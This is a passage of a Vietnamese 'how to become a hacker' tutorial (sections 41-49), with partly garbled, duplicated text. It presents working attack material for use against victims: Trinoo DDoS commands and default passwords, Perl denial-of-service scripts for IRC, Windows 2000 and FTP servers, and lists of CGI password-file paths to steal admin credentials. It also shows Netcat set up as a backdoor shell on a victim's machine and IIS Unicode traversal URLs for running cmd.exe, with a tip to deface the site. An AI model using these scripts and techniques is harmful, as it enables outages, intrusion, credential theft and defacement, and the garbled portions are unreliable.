Những hiểu biết cơ bản nhất để trở thành Hacker phần 3 41 . ) Tấn công DDoS thông qua Trinoo : _ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu.
Những hiểu biết để trở thành Hacker phần trang đọc lần 41 ) Tấn công DDoS thông qua Trinoo : _ Bạn biết DDoS attack phải khơng ? Một công DDoS Trinoo thực kết nối Hacker Trinoo Master dẫn cho Master để phát động công DDoS đến hay nhiều mục tiêu Trinoo Master liên lạc với Deadmons đưa địa dẫn đến để công hay nhiều mục tiêu khoảng thời gian xác định _ Cả Master Deamon bảo vệ Passwd biết passwd điều khiển chúng , điều khơng có khó khăn chủ nhân thực chúng Những passwd thường mã hoá bạn thiết lập biên dịch Trinoo từ Source -> Binnary Khi chạy , Deadmons dấu nhắc chờ passwd nhập vào , passwd nhập sai tự động cịn passwd nhập tự động chạy hệ thống attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]' kwijibo Connection closed by foreign host < == Bạn nhập sai attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]' betaalmostdone trinoo v1.07d2+f3+c [rpm8d/cb4Sx/] trinoo> < == bạn vào hệ thống trinoo _ Đây vài passwd mặc định : “l44adsl": pass trinoo daemon "gorave": passwd trinoo master server startup "betaalmostdone": passwd điều khiển từ xa chung cho trinoo master "killme": passwd trinoo master điều khiển lệnh "mdie" _ Đây số lệnh dùng để điều khiển Master Server: CODE die Shutdown quit Log off mtimer N Đặt thờI gian để công DoS , vớI N nhận giá trị từ > 1999 giây dos IP -Tấn công đến địa IP xác định mdie pass -Vơ hiệu hố tất Broadcast , passwd xác Một lệnh đưọc gửi tới ("d1e l44adsl") Broadcast để Shutdown chúng Một passwd riêng biệt đặt cho mục mping Gửi lệnh ping tới ("png l44adsl") c¸c Broadcast mdos Send nhiều lênh DOS ("xyz l44adsl 123:ip1:ip2") đến Broadcast info -Hiển thị thông tin Trinoo msize Đặt kích thước đệm cho gói tin send suốt thờI gian DoS nslookup host Xác định tên thiết bị Host mà Master Trinoo chạy usebackup -Chuyển tớI file Broadcast lưu tạo lệnh “killdead” bcast -Liệt kê danh sách tất Broadcast khai thác help [cmd] -Đưa danh sách lệnh mstop -Ngừng lại cuốc công DOS _ Đây số lệnh dùng để điều khiển Trinoo Deadmons: CODE aaa pass IP Tấn công đến địa IP xác định GửI gói tin UDP (0-65534) đến cổng UDP địa IP xác định khoảng thời gian xác định mặc định 120s hay từ >1999 s bbb pass N -Đặt thờI gian giới hạn cho công DOS Shi pass Gửi chuỗi “*HELLO*” tới dánh sách Master Server biên dịch chương trình cổng 31335/UDP png pass -Send chuỗi “Pong” tớI Master Server phát hành lệnh điều khiển cổng 31335/UDP die pass Shutdown Trinoo rsz N Là kích thước đệm dùng để cơng , tính byte xyz pass 123:ip1:ip3 công DOS nhiều mục tiêu lúc 42 ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : _ WircSrv IRC Server IRC thơng dụng Internet ,nó bị Crash bị Hacker gửi Packet lớn giá trị ( 65000 ký tự ) cho phép đến Port 6667 Bạn thực việc cách Telnet đến WircSrv Port 6667: Nếu bạn dùng Unix: [hellme@die-communitech.net$ telnet irc.example.com 6667 Trying example.com Connected to example.com Escape character is '^]' [buffer] Windows tương tự: telnet irc.example.com 6667 Lưu ý: [buffer] Packet liệu tương đương với 65000 ký tự Tuy nhiên , crash đơn giản đoạn mã sau ( Các bạn nhìn vào đoạn mã tự giải mã câu lệnh , cách tập luyện cho phản xạ hacker họ nghiên cứu Nào , phân tích cách ): CODE #!/usr/bin/perl #< == Đoạn mã cho ta biết dùng cho lệnh perl use Getopt::Std; use Socket; getopts('s:', \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto); $foo = "A"; # Đây NOP $number = "65000"; # Đây tất số NOP $data = $foo x $number; # kết $foo times $number $serv = $args{s}; # lệnh điều khiển server từ xa $port = 6667; # lệnh điều khiển cổng từ xa , mặc định 6667 $buf = "$data"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print S "$buf"; print("Data has been successfully sent to $serv\n"); sub usage {die("\n\n Lỗi WircSrv Version 5.07s cơng DoS \n gửi 64k gói tin đến server làm cho crash.\n -s server_ip\n\n");} Để sử dụng mã , bạn save vào file *.pl , rồI down chương trình activeperl sài , setup vào HĐH DOS bạn cần gọi file theo lệnh sau : C:\>perl < đường dẫn đến file *.pl > ( Đến không bày thật cặn kẽ mà tăng dần độ khó lên , bạn nghiên cứu kỹ trước bạn làm dễ dàng ) 43 ) Kỹ thuật cơng DoS vào máy tính sử dụng HĐH Win2000 : _ Muốn sử dụng , bạn phải có activeperl , sử dụng hướng dẫn tương tự Save đoạn mã vào file *.pl rồI dùng lệnh perl gọi : CODE #!/usr/bin/perl -w use Socket; use Net::RawIP; use Getopt::Std; getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##; print" - $0 v.$ver b/ Nelson Brito / Independent Security Consultant - "; $l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2; $v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64; $p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! "); ($o{'s'}&&$o{'d'})||die " Use: $0 [IP Options] [UDP Options] ", "IP Options: ", " -s* Đia chi nguon đe bat chuoc ", " -d* Đia chi bi tan cong ", " -v IP Version (def: $v) ", " -t IP Type of Service (TOS) (def: $t) ", " -f IP fragementation offset (def: $f) ", " -T IP Time to Live (TTL) (def: $T) ", "UDP Options: ", " -p cong cua may tinh nan nhan (def: $p) ", " -l chieu dai cua goi tin (def: $l) ", " -r cai đat du lieu ngau nhien (def: ".") ", "Generic: ", " -n So luong goi tin ta muon gui (def: $n) ", " -L gui goi tin lien tuc khong ngung cho đen may tinh cua nan nhan bi die he he", " Bai huong dan cua ANHDENDAY "; while($n > 0){ $|=1;print".";$sp=int rand 65535; $D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l; $nb=new Net::RawIP({ ip=> { version=>$v, tos=>$t, ttl=>$T, frag_off=>$f, saddr=>$o{'s'}, daddr=>$o{'d'} }, udp=> { source=>$sp, dest=>$p, len=>$l, data=>$D } }); $nb->send;undef $nb;!$o{'L'}&&$n ; } print"Finish! "; _ Khi gọi bạn chọn tuỳ chọn ghi mà DoS Nhớ dùng cho Win2000 44 ) Kỹ thuật công DoS dễ dàng : _ Tơi lần muốn cơng DoS dùng chương trình , chẳng kén dễ thực Bây chia sẻ với bạn _ Bạn cần phải có Activeperl ( lại activepert ) cài sẵn , save đoạn mã sau vào file abc.pl : CODE #!/usr/bin/perl use IO::Socket; sub initiate { if ($ARGV[0] eq '') {die "Usage: perl abc.pl \nVi du : perl abc.pl 127.0.0.1 21 anonymous me@\n";} $host = $ARGV[0]; $port = $ARGV[1]; $user = $ARGV[2]; $pass = $ARGV[3]; }; sub connecttoserver { print("Connect den host: $host\n"); $socket = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM ) || die "khong the connect den $host"; print "Connect cong Loggin vao \n"; }; sub login { print "user $user\n"; print $socket "user $user\r\n"; $response = print "$response\n"; print "pass $pass\n"; print $socket "pass $pass\r\n"; $response = print "$response\n"; print "Logged in Dang tan cong DoS doi phuong Nhan CTRL-C de ngung.\n"; }; sub doit { for (;; ){ print "retr a:/x\n"; print $socket "retr a:/x\r\n"; $response = print "$response"; } } initiate(); connecttoserver(); login(); doit(); _Nếu bạn qua lập trình đọc đoạn mã bạn thấy đoạn mã dùng thơng tin từ ổ đĩa A nạn nhân để công nạn nhân Nó sử dụng vịng lặp khơng có giới hạn từ hàm $socket "retr a:/x\r\n" Khi muốn kết thúc bạn cần nhấn ctrl+C _Cuối bạn cần gọi thơng qua lệnh perl VD : perl abc.pl http://www.xxx.com/ anonymous me User name Password Vậy coi bạn biết công DoS phải không ? Đó cách cơng DoS thơng thường ( hậu chẳng thường thường chút ) , kỹ thuật DoS lợi hại khác DRDoS cho bạn nghiên cứu thêm Nó nguy hiểm sử dụng lung tung nên để dành phần cho bạn thích thật muốn nghiên cứu Tôi xin dừng phần DoS 45 ) Tự tạo cho proxy để sài : _Trong công việc công DoS hay đột nhập vào trang Web có trang bị firewall bạn cần đến proxy để sài Do bạn tự tạo cho proxy made in sài cho oai Bây làm _ Trước hết bạn đăng ký host miễn phí trang free.prohosting.com Bạn khai báo thông tin bạn ô nhập thông tin Cuối đăng ký xong bạn nhận Mail từ trang Web gửi đến , test để lấy pass mặc định mà cho bạn _ Tiếp theo bạn vào trang www.xav.com , nhấp vào link install phía dịng chữ Test - script Package( tui nhớ có tên mang chữ script ) Sau bạn nhấn "next" nhìn phía trang có chữ show all verdon , bạn nhấn vào _ Tiếp tục bạn nhấn James Marshall ==>CGIscript ==>CGIproxy==>Next==>accept==> bạn thấy bảng có nhiều ô nhập thông tin Bạn nhập thông tin vào trang : + your Website : nhập địa trang Web bạn đăng ký prohosting.com + FTP username : Bạn nhập username mà bạn đăng ký prohosting.com + FTP password : Bạn nhập passwd mà prohosting.com send mail cho bạn + Mấy cịn lại khơng cần thiết , bạn nhấp next để tiếp tục Rồi nhấn finish + Cuối cho bạn địa bạn vừa tạo proxy , bạn ghi nhớ Sau lần “hành động” bạn lại đem sài 46 ) Kỹ thuật lấy pass thông qua lỗi số Script : a ) Calendar CGI Script : _ Một số scripts tìm thấy điểm yếu calendar scripts , nằm thư mục cgi-bin/calendar, file config file calendar.cfg chứa administrator username password để thay đổi chọn lựa cho scripts cần , tìm thấy cuối file calendar.cfg , nhiên chúng mã hoá việc dùng John The Ripper hay cơng cụ khác để giải mã xong : _file calendar.cfg thường đặt địa sau : http://www.xxx.com/cgi-bin/calendar/calendar.cfg sau crack xong đến Admin Control Login vào địa : http://www.xxx.com/cgi-bin/calen _admin.pl?admin _ Vậy bạn có quyền admin b ) WebBBS Script : _WebAdverts Script scripts cho phép webmasters hiển thị biểu ngữ luân phiên ( quảng cáo chẳng hạn ) hay thêm vào trang Web , cuối bạn sử dụng kết hợp password username để cài đặt banners tạo banner accounts , xoá accounts view sensitive info, vv.vv _Địa passwd WebAdverts : http://www.xxx.com/cgi-bin/advert/adpassword.txt sau giải mã bạn logging vào: http://www.xxx.com/cgi-bin/advert/ads_admin.pl để login script administrator c ) WWWBoard Script : _WWWBoard có file password tìm thấy pasword.txt , search từ khố cgi-bin/wwwebboard webboard/password.txt d ) Mailmachine Script : _Mailmachine.cgi webbased mailinglist , bạn trơng thấy file adressed.txt chứa tất danh sách khách đăng ký , danh sách thấy urls sau: http://www.xxx.com/cgi-bin/mailman/addresses.txt http://www.xxx.com/cgi-bin/maillist/addresses.txt http://www.xxx.com/cgi-bin/mail/addresses.txt bạn nên tìm addresses.txt mà chúng đổi thành tên khác Chúng chứa thơng tin quan trọng cho phép bạn khai thác Việc tìm trang bị lỗi hẳn bạn biết , không nhắc lại ( Nếu chưa biết vui lịng đọc lạI phần trước ) ================================================= ===== Nhân tơi xin đính lại đoạn code mà tơi phân tích post lên phần trước sơ ý không thêm ký hiệu “#” vào trước câu phân tích , dẫn đến việc số bạn thắc mắc đoạn code không hoạt động Tôi thành thật xin lỗi bạn sơ ý tơi , bạn cần lấy đoạn code thêm vào dấu “ # ” phía trước dịng thích Tiếng Việt tơi ( Thơng thường tơi có sử dụng dấu “ < == ” để giải thích phiá đoạn code Các bạn để ý mà fix 47 ) Các công cụ cần thiết để hack Web : _ Đối với hacker chuyên nghiệp họ khơng cần sử dụng cơng cụ mà họ trực tiếp setup phiên mà trang Web nạn nhân sử dụng máy để test lỗi Nhưng bạn “vào nghề” cơng cụ cần thiết , sử dụng chúng vài lần bạn biết cách phối hợp chúng để việc tìm lỗi trang Web nạn nhân nhanh chóng Sau số công cụ bạn cần phải có máy “làm ăn” : _ Công cụ thứ : Một proxy dùng để che dấu IP vượt tường lửa cần ( Cách tạo Proxy bày phần , bạn xem lại ) _ Cơng cụ thứ : Bạn cần có shell account, thực quan trọng bạn Một shell account tốt shell account cho phép bạn chạy chương trình nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, shell account cần phải cài chương trình GCC ( quan trọng việc dịch (compile) exploit viết C) MinGW, Cygwin dev tools khác Shell account gần giống với DOS shell,nhưng có nhiều câu lệnh chức DOS Thông thường bạn cài Unix bạn có shell account, bạn khơng cài Unix bạn nên đăng ký mạng shell account free có cài Unix thiết lập cho bạn shell account bạn log vào telnet (Start > Run > gõ Telnet) để dùng shell account Sau số địa bạn đăng ký free shell account : http://www.freedomshell.com/ http://www.cyberspace.org/shell.html http://www.ultrashell.net/ _Công cụ thứ : NMAP Công cụ quét cực nhanh mạnh Có thể quét mạng diện rộng đặc biệt tốt mạng đơn lẻ NMAP giúp bạn xem dịch vụ chạy server (services / ports : webserver , ftpserver , pop3, ),server dùng hệ điều hành gì,loại tường lửa mà server sử dụng, nhiều tính khác.Nói chung NMAP hỗ trợ hầu hết kỹ thuật quét : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open), NMAP đánh giá công cụ hàng đầu Hacker nhà quản trị mạng giới Mọi thông tin NMAP bạn tham khảo http://www.insecure.org/ _ Công cụ thứ : Stealth HTTP Security Scanner công cụ quét lỗi bảo mật tuyệt vời Win32 Nó quét 13000 lỗi bảo mật nhận diện 5000 exploits khác _ Công cụ thứ : IntelliTamper công cụ hiển thị cấu trúc Website gồm thư mục file nào, liệt kê thư mục file có set password Rất tiện cho việc Hack Website trước bạn Hack Website bạn phải nắm số thơng tin Admin Website _ Công cụ thứ : Netcat công cụ đọc ghi liệu qua mạng thông qua giao thức TCP UDP Bạn dùng Netcat cách trực tiếp sử dụng chương trình script khác để điều khiển Netcat Netcat coi exploitation tool tạo liên kết bạn server cho việc đọc ghi liệu ( tất nhiên Netcat cài server bị lỗI ) Mọi thông tin Netcat bạn tham khảo http://www.l0pht.com/ _ Cơng cụ thứ : Active Perl công cụ đọc file Perl *.pl exploit thường viết Perl Nó cịn sử dụng để thi hành lệnh thông qua file *.pl _ Công cụ thứ : Linux hệ điều hành hầu hết hacker sử dụng _ Công cụ thứ : L0phtCrack công cụ số để Crack Password Windows NT/2000 _ Cách Download tơi bày nên khơng nói , bạn Download nhớ ý đến phiên chúng , phiên có số lớn bạn Down mà sài có thêm số tính mà phiên trước chưa có Nếu down mà bạn khơng biết sử dụng tìm lại viết cũ có hướng dẫn bên Box “Đồ nghề” Nếu khơng thấy post hỏi , bạn bên trả lời cho bạn 48 ) Hướng dẫn sử dụng Netcat : a ) Giới thiệu : Netcat công cụ thiếu bạn muốn hack website mạnh tiện dụng Do bạn cần biết chút Netcat b ) Biên dịch : _ Đối với Netcat cho Linux, bạn phải biên dịch trước sử dụng - hiệu chỉnh file netcat.c vi: vi netcat.c + tìm dịng res_init(); main() thêm vào trước dấu "/": // res_init(); + thêm dòng sau vào phần #define (nằm đầu file): #define GAPING_SECURITY_HOLE #define TELNET - biên dịch: make linux - chạy thử: /nc -h - bạn muốn chạy Netcat nc thay cho /nc, bạn cần hiệu chỉnh lại biến môi trường PATH file ~/.bashrc, thêm vào ":." PATH=/sbin:/usr/sbin: : _ Bản Netcat cho Win không cần phải compile có sẵn file nhị phân nc.exe Chỉ giải nén chạy xong c ) Các tùy chọn Netcat : _ Netcat chạy chế độ dòng lệnh Bạn chạy nc -h để biết tham số: CODE C:\>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] listen for inbound: nc -l -p port [options] [hostname] [port] options: -d - tách Netcat khỏi cửa sổ lệnh console, Netcat chạy chế độ steath(không hiển thị Taskbar) -e prog - thi hành chương trình prog, thường dùng chế độ lắng nghe -h - gọi hướng dẫn -i secs - trì hỗn secs mili giây trước gởi dòng liệu -l - đặt Netcat vào chế độ lắng nghe để chờ kết nối đến -L buộc Netcat "cố" lắng nghe Nó lắng nghe trở lại sau ngắt kết nối -n dùng địa IP dạng số, chẳng hạn 192.168.16.7, Netcat không thẩm vấn DNS -o file ghi nhật kí vào file -p port - định cổng port -r yêu cầu Netcat chọn cổng ngẫu nhiên(random) -s addr - giả mạo địa IP nguồn addr -t - không gởi thông tin phụ phiên telnet Khi bạn telnet đến telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client bạn gởi đến thông tin phụ biến môi trường TERM, USER Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat không gởi thông tin đến telnetd -u - dùng UDP(mặc định netcat dùng TCP) -v - hiển thị chi tiết thông tin kết nối -vv - hiển thị thông tin chi tiết -w secs đặt thời gian timeout cho kết nối secs mili giây -z - chế độ zero I/O, thường sử dụng scan port Netcat hổ trợ phạm vi cho số hiệu cổng Cú pháp cổng1-cổng2 Ví dụ: 1-8080 nghĩa 1,2,3, ,8080 d ) Tìm hiểu Netcat qua VD : _ Chộp banner web server : Ví dụ: nc đến 172.16.84.2, cổng 80 CODE C:\>nc 172.16.84.2 80 HEAD / HTTP/1.0 (tại bạn gõ Enter lần) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html Để biết thông tin chi tiết kết nối, bạn dùng –v ( -vv cho biết thông tin chi tiết nữa) C:\>nc -vv 172.16.84.1 80 CODE 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: "0-cec-3899eaea" Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, dùng -o Ví dụ: nc -vv -o nhat_ki.log 172.16.84.2 80 xem file nhat_ki.log xem thử ghi : CODE < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT Server: Ap < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32) Last-Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T ETag: "0cec< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea" Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # ContentLength: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308 Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l dấu < nghĩa server gởi đến netcat dấu > nghĩa netcat gởi đến server _ Quét cổng : Bạn chạy netcat với tùy chọn –z Nhưng để quét cổng nhanh hơn, bạn dùng -n netcat khơng cần thấm vấn DNS Ví dụ để scan cổng TCP(1>500) host 172.16.106.1 CODE [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open bạn cần scan cổng UDP, dùng -u CODE [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open _ Biến Netcat thành trojan : Trên máy tính nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành chương trình có kết nối đến, thường shell lệnh cmd.exe ( NT) /bin/sh(đối với Unix) Ví dụ: CODE E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error Trên máy tính dùng để cơng, bạn việc dùng netcat nối đến máy nạn nhân cổng định, chẳng hạn 8080 CODE C:\>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp E:\>cd test cd test E:\test>dir /w dir /w Volume in drive E has no label Volume Serial Number is B465-452F Directory of E:\test [.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe File(s) 262,499 bytes Dir(s) 191,488,000 bytes free C:\test>exit exit sent 20, rcvd 450: NOTSOCK Như bạn thấy , ta làm máy nạn nhân , cần số lệnh , ta chiếm máy tính đối phương , bạn xem tiếp : CODE E:\>nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 ? ? Riêng Netcat cho Win, bạn lắng nghe cổng lắng nghe Chỉ cần định địa nguồn -s Ví dụ: CODE netstat -a TCP nan_nhan:domain nan_nhan:0 LISTENING nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe cổng 53 listening on [172.16.84.1] 53 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163? ? Trên Windows NT, để đặt Netcat chế độ lắng nghe, khơng cần phải có quyền Administrator, cần login vào với username bình thường khởi động Netcat xong Chú ý: bạn chạy netcat với -u -e cmd.exe -u -e /bin/sh netcat khơng làm việc Nếu bạn muốn có UDP shell Unix, dùng udpshell thay cho netcat ( Dựa theo viết huynh Vicky ) 49 ) Kỹ thuật hack IIS server 5.0 : _ IIS server với phiên từ trước đến phiên 5.0 có lỗi để ta khai thác , hầu hết người dùng IIS server 5.0 nên lỗi phiên trước không đề cập đến Bây bày bạn cách hack thông qua cơng cụ activeperl IE , bạn vận dụng cho trang Web VN chúng bị lỗi nhiều Ta bắt đầu _ Trước hết bạn download activeperl Unicode.pl _ Sử dụng telnet để xác định trang Web ta cơng có sử dụng IIS server 5.0 hay không : CODE telnet < tên trang Web > 80 GET HEAD / HTTP/1.0 Nếu khơng báo cho ta biết mục tiêu sử dụng chương trình bạn thay đổi cổng 80 cổng khác 8080, 81, 8000, 8001 v.v… _ Sau xác định mục tiêu bạn vào DOS gõ : CODE perl unicode.pl Host: ( gõ địa server mà bạn muốn hack ) Port: 80 ( 8080, 81, 8000, 8001 tuỳ theo cổng mà ta telnet trước ) _ Các bạn thấy bảng liệt kê lỗi ( lập trình Unicode.pl ) sau : CODE [1] /scripts/ %c0%af /winnt/system32/cmd.exe?/c+ [2]/scripts %c1%9c /winnt/system32/cmd.exe?/c+ [3] /scripts/ %c1%pc /winnt/system32/cmd.exe?/c+ [4]/scripts/ %c0%9v /winnt/system32/cmd.exe?/c+ [5] /scripts/ %c0%qf /winnt/system32/cmd.exe?/c+ [6] /scripts/ %c1%8s /winnt/system32/cmd.exe?/c+ [7] /scripts/ %c1%1c /winnt/system32/cmd.exe?/c+ [8] /scripts/ %c1%9c /winnt/system32/cmd.exe?/c+ [9] /scripts/ %c1%af /winnt/system32/cmd.exe?/c+ [10] /scripts/ %e0%80%af /winnt/system32/cmd.exe?/c+ [11]/scripts/ %f0%80%80%af /winnt/system32/cmd.exe?/c+ [12] /scripts/ %f8%80%80%80%af /winnt/system32/cmd.exe?/c+ [13]/scripts/ %fc%80%80%80%80%af /winnt/system32/cmd.exe?/c+ [14]/msadc/ \%e0\%80\%af / \%e0\%80\%af / \%e0\%80\%af /winnt/sys tem32/cmd.exe?/c+ [15]/cgibin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe ?/c+ [16]/samples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system3 2/cmd.exe?/c+ [17]/iisadmpwd/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/syste m32/cmd.exe?/c+ [18]/_vti_cnf/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system3 2/cmd.exe?/c+ [19]/_vti_bin/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/system3 2/cmd.exe?/c+ [20]/adsamples/ %c0%af %c0%af %c0%af %c0%af %c0%af /winnt/syste m32/cmd.exe?/c+ Các bạn thấy tất lỗi trang Web nạn nhân bị tất lỗi , server nạn nhân bị lỗi thứ 13 17 bảng kết xuất dòng thứ 13 17 mà Tôi lấy VD bảng kết cho biết trang Web nạn nhân bị lỗi thứ , IE nhập đoạn mã tương ứng Address : http://www.xxx.com/scripts/ %c1%pc /winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ http://www.xxx.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ Đến bạn xâm nhập vào server nạn nhân , bạn sử dụng lệnh DOS mà khai thác thông tin Thông thường trang Web nằm thư mục vinetpub\wwwroot , bạn vào rồI cần thay index.html vớI tên hack by … Là , đừng quậy họ Xem tiếp ... 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 #... 74 2d 4d 6f 64 69 66 69 # 32 ) Last-Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02... 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # ContentLength: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 33 08 Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e